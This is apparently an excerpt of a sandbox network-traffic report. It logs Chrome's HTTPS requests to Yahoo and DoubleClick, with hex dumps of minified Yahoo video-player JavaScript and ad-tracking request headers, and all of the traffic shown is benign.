                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 6d 69 73 65 2c 72 3d 65 2e 72 65 73 6f 6c 76 65 2c 6f 3d 65 2e 72 65 6a 65 63 74 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 74 28 6e 29 3b 76 28 69 2c 72 2c 6f 2c 65 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 6f 28 65 29 7d 7d 7d 74 2e 5f 6f 76 65 72 72 69 64 65 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 65 7d 3b 76 61 72 20 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 70 6f 73 74 4d 65 73 73 61 67 65 3f 28 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 69 29 2c 65 3d 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: mise,r=e.resolve,o=e.reject;return function(){try{var e=t(n);v(i,r,o,e,e)}catch(e){o(e)}}}t._overrideUnhandledExceptionHandler=function(e){n=e};var m=function(){var e;"undefined"!=typeof window&&window.postMessage?(window.addEventListener("message",i),e=f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1378INData Raw: 38 34 38 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 3f 65 2e 66 69 6c 74 65 72 28 6c 29 2e 6c 65 6e 67 74 68 3e 30 3a 21 21 65 2e 6d 6f 64 65 26 26 22 61 6d 70 22 3d 3d 3d 65 2e 66 72 61 6d 65 77 6f 72 6b 7d 76 61 72 20 73 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 65 3b 69 66 28 30 21 3d 3d 73 29 72 65 74 75 72 6e 20 32 3d 3d 3d 73 3b 76 61 72 20 74 3d 6c 28 28 30 2c 61 2e 63 56 29 28 29 29 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2e 69 6e 64 65 78 4f 66 28 22 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6e 65 74 22 29 3e 2d 31 26 26 21 21 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 6f 2e 74 70 2e 63 6f 6e 74 65 78 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 848);function l(e){return e instanceof Array?e.filter(l).length>0:!!e.mode&&"amp"===e.framework}var s=0;function c(){var e;if(0!==s)return 2===s;var t=l((0,a.cV)());return t||(t=window.location.host.indexOf(".ampproject.net")>-1&&!!(null===(e=o.tp.context


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    90192.168.2.44985287.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC538OUTGET /aaq/wf/wf-video-3.2.2-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: a+wLDU2Nh5UYC4g8os1UWv12L9LD7wuwTUFB7ODDrTh5lPfnupOlXeYS7JVqtOLMoggtuvvqWd0=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: BSAEYAZZF0EEQAMR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 23 Sep 2024 04:15:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 16 Sep 2024 04:28:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "d133cbea9c1d56d1cbe4cb6e77f0ebf6"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: 9YmMglcw85BjD8aFXilrFBHITet6QmcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 30142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 651936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 76 69 64 65 6f 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 76 69 64 65 6f 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-video",[],t):"object"==typeof exports?exports["wafer-video"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 76 61 72 20 69 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 65 29 74 2e 69 6e 64 65 78 4f 66 28 61 29 3e 3d 30 7c 7c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function r(e,t){var i={};for(var a in e)t.indexOf(a)>=0||Object.prototype.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 69 2c 61 29 7b 72 65 74 75 72 6e 20 69 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 69 29 2c 61 26 26 65 28 74 2c 61 29 2c 74 7d 7d 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 69 2c 61 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 69 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 65 28 6f 2c 69 2c 61 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: }return function(t,i,a){return i&&e(t.prototype,i),a&&e(t,a),t}}(),f=function e(t,i,a){null===t&&(t=Function.prototype);var n=Object.getOwnPropertyDescriptor(t,i);if(void 0===n){var o=Object.getPrototypeOf(t);return null===o?void 0:e(o,i,a)}if("value"in n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 7b 7d 3a 74 2c 61 3d 72 28 65 2c 5b 22 6d 65 74 61 64 61 74 61 22 5d 29 3b 72 65 74 75 72 6e 20 76 28 7b 7d 2c 61 2c 69 29 7d 29 7c 7c 6e 75 6c 6c 2c 77 3d 76 6f 69 64 20 30 3b 69 66 28 6c 29 7b 76 61 72 20 43 3d 6c 5b 22 73 6f 75 72 63 65 2d 6d 65 74 61 64 61 74 61 2d 70 6c 75 67 69 6e 22 5d 7c 7c 7b 7d 2c 62 3d 43 5b 22 6d 65 64 69 61 2f 73 61 70 69 22 5d 3b 62 26 26 28 77 3d 7b 63 75 73 74 6f 6d 50 61 72 61 6d 73 3a 62 2e 71 73 7d 29 7d 76 61 72 20 45 3d 70 2e 64 6f 63 6b 69 6e 67 2c 50 3d 72 28 70 2c 5b 22 64 6f 63 6b 69 6e 67 22 5d 29 2c 6b 3d 6e 75 6c 6c 3b 69 66 28 45 29 7b 76 61 72 20 4f 3d 45 2e 65 6e 61 62 6c 65 4f 6e 53 63 72 6f 6c 6c 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: on(e){var t=e.metadata,i=void 0===t?{}:t,a=r(e,["metadata"]);return v({},a,i)})||null,w=void 0;if(l){var C=l["source-metadata-plugin"]||{},b=C["media/sapi"];b&&(w={customParams:b.qs})}var E=p.docking,P=r(p,["docking"]),k=null;if(E){var O=E.enableOnScrollD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 41 74 74 72 69 62 75 74 65 28 5f 2b 22 70 61 75 73 65 2d 77 68 65 6e 2d 6f 75 74 2d 6f 66 2d 76 69 65 77 70 6f 72 74 22 29 2c 77 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 6d 61 6e 61 67 65 2d 6f 6e 2d 69 6e 74 65 72 61 63 74 69 6f 6e 22 29 2c 43 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 6c 6f 6f 70 2d 63 6f 75 6e 74 22 29 2c 45 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 69 64 22 29 2c 50 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 74 61 72 67 65 74 22 29 2c 6b 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 76 69 65 77 61 62 69 6c 69 74 79 22 29 2c 4f 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 70 61 75 73 65 2d 76 69 65 77 61 62 69 6c 69 74 79 22 29 2c 56 3d 65 2e 67 65 74 41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Attribute(_+"pause-when-out-of-viewport"),w=e.getAttribute(_+"manage-on-interaction"),C=e.getAttribute(_+"loop-count"),E=e.getAttribute(_+"id"),P=e.getAttribute(_+"target"),k=e.getAttribute(_+"viewability"),O=e.getAttribute(_+"pause-viewability"),V=e.getA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 28 29 2c 6c 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 54 69 6d 65 6f 75 74 3d 6e 75 6c 6c 29 2c 22 79 76 69 64 65 6f 50 6c 61 79 6c 69 73 74 22 3d 3d 3d 63 26 26 6c 2e 70 6c 61 79 6c 69 73 74 44 69 64 4d 6f 75 6e 74 28 53 2c 45 29 2c 6c 7d 72 65 74 75 72 6e 20 6f 28 74 2c 65 29 2c 63 28 74 2c 5b 7b 6b 65 79 3a 22 70 6c 61 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 70 6c 61 79 65 72 3b 65 26 26 28 65 2e 69 73 50 6c 61 79 69 6e 67 28 29 7c 7c 65 2e 70 6c 61 79 28 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 70 6c 61 79 69 6e 67 3d 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 70 61 75 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 70 6c 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (),l._state.mouseTimeout=null),"yvideoPlaylist"===c&&l.playlistDidMount(S,E),l}return o(t,e),c(t,[{key:"play",value:function(){var e=this._util.player;e&&(e.isPlaying()||e.play(),this._state.playing=!0)}},{key:"pause",value:function(){var e=this._util.pla
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 22 79 76 69 64 65 6f 22 3d 3d 3d 6e 26 26 74 68 69 73 2e 72 65 6d 6f 76 65 49 6e 73 74 61 6e 63 65 46 72 6f 6d 55 75 69 64 43 6f 6c 6c 65 63 74 69 6f 6e 28 29 2c 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 64 65 73 74 72 6f 79 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 63 72 65 61 74 65 44 65 66 61 75 6c 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this.removeEventListeners(),"yvideo"===n&&this.removeInstanceFromUuidCollection(),f(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"destroy",this).call(this)}},{key:"_createDefault",value:function(){var e=this;if(arguments.length>0&&void 0!==ar
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 76 69 64 65 6f 2d 64 65 66 61 75 6c 74 22 29 3b 76 61 72 20 70 3d 75 2c 6d 3d 28 70 2e 68 65 69 67 68 74 2c 70 2e 77 69 64 74 68 2c 72 28 70 2c 5b 22 68 65 69 67 68 74 22 2c 22 77 69 64 74 68 22 5d 29 29 2c 68 3d 7b 7d 3b 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 79 76 69 64 65 6f 22 29 2c 66 26 26 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 2e 61 70 70 6c 79 28 79 2e 63 6c 61 73 73 4c 69 73 74 2c 66 29 2c 75 2e 66 6f 72 63 65 44 69 73 61 62 6c 65 46 69 72 73 74 41 64 26 26 50 28 22 79 76 61 70 46 22 29 3b 76 61 72 20 67 3d 76 28 7b 73 74 61 72 74 73 63 72 65 65 6e 3a 7b 73 68 6f 77 54 69 74 6c 65 3a 21 30 2c 73 68 6f 77 44 65 73 63 3a 21 30 2c 73 68 6f 77 50 72 6f 76 69 64 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: List.add("wafer-video-default");var p=u,m=(p.height,p.width,r(p,["height","width"])),h={};y.classList.add("wafer-yvideo"),f&&y.classList.add.apply(y.classList,f),u.forceDisableFirstAd&&P("yvapF");var g=v({startscreen:{showTitle:!0,showDesc:!0,showProvider
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 65 2e 62 6f 75 6e 64 61 72 79 2c 69 3d 65 2e 65 6c 65 6d 2c 61 3d 69 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 65 6e 64 2d 73 63 72 6e 2d 63 6c 61 73 73 22 29 2c 6e 3d 61 26 26 74 26 26 62 28 69 2c 74 29 2c 6f 3d 6e 26 26 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3b 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6e 64 53 63 72 65 65 6e 45 6c 3d 6f 7d 7d 2c 7b 6b 65 79 3a 22 5f 61 64 64 4e 61 74 69 76 65 56 69 64 65 6f 45 76 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 6f 70 43 6f 75 6e 74 26 26 28 65 2e 6c 6f 6f 70 3d 21 31 2c 67 28 65 2c 22 65 6e 64 65 64 22 2c 74 68 69 73 2e 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: e.boundary,i=e.elem,a=i.getAttribute(_+"end-scrn-class"),n=a&&t&&b(i,t),o=n&&n.getElementsByClassName(a)[0];this._util.endScreenEl=o}},{key:"_addNativeVideoEvents",value:function(){var e=this._util.elem;this._state.loopCount&&(e.loop=!1,g(e,"ended",this.h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 69 73 2e 5f 75 74 69 6c 2e 74 79 70 65 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6c 6f 6f 70 43 6f 75 6e 74 3b 65 26 26 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 6f 70 43 6f 75 6e 74 3d 4e 75 6d 62 65 72 28 65 29 29 2c 74 68 69 73 2e 5f 63 72 65 61 74 65 44 65 66 61 75 6c 74 28 21 30 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 56 69 64 65 6f 4d 6f 75 73 65 4c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 79 76 69 64 65 6f 50 6c 61 79 6c 69 73 74 22 3d 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 74 79 70 65 26 26 77 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 54 69 6d 65 6f 75 74 2c 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 4e 61 74 69 76 65 56 69 64 65 6f 45 6e 64 22 2c 76 61 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: is._util.type){var e=this._util.loopCount;e&&(this._state.loopCount=Number(e)),this._createDefault(!0)}}},{key:"handleVideoMouseLeave",value:function(e){"yvideoPlaylist"===this._util.type&&w(this._state.mouseTimeout,this)}},{key:"handleNativeVideoEnd",val


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    91192.168.2.449853188.125.72.1394434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1276OUTPOST /p?s=2023538075&t=1727716859962&_I=&_AO=0&_NOL=0&etrg=backgroundPost&outcm=gamDebug&src=unknown&site=fp&partner=none&lang=en-US&region=US&device=desktop&colo=bf1&bucket=900%2Cseamless&rid=1pa4ckpjflnfm&limitedAds=false&NPA=false&pd=unknown&pt=unknown&usercountry=US&benjiVersion=2.1.123&prebidVersion=unknown&yahooPrebidVersion=unknown&type=PREBID_SESSION_START HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: noa.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC503INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:21:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    p3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: no-cache, no-store, private
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-length: 43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    92192.168.2.449855142.250.185.1304434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC637OUTGET /tag/js/gpt.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
